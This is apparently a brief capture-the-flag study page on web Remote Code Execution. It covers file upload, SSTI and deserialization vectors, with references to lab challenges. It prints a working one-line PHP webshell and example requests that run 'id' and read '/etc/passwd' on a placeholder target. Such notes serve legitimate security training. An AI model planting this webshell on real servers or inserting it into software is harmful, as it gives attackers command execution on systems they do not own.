Remote Code Execution (RCE)

Table of Contents

• Remote Code Execution (RCE)
  • Table of Contents
  • Overview
  • Vectors Covered
    • PHP file upload / webshell
    • SSTI to RCE
    • Deserialization
  • Webshell Reference
  • References
    • Challenges
    • Web Sites

---

Overview

Techniques for achieving RCE through web application vulnerabilities.

---

Vectors Covered

PHP file upload / webshell

Upload a malicious PHP file to a server that allows unrestricted file uploads, then trigger execution via a direct HTTP request.

SSTI to RCE

Escalate a server-side template injection vulnerability to OS command execution. See ../ssti/.

Deserialization

Exploit unsafe deserialization of user-controlled objects to execute arbitrary code.

---

Webshell Reference

Minimal PHP webshell for upload scenarios:

<?php system($_GET['cmd']); ?>

Usage after upload:

http://target/uploads/shell.php?cmd=id
http://target/uploads/shell.php?cmd=cat+/etc/passwd

---

References

Challenges

Source	Name
Immersive Labs: Haunted Hollow, Lab 9	Mirrored Mayhem
Holiday Hack Challenge 2024, Act III	Deactivate the Ransomware

Web Sites

• PayloadsAllTheThings - File Upload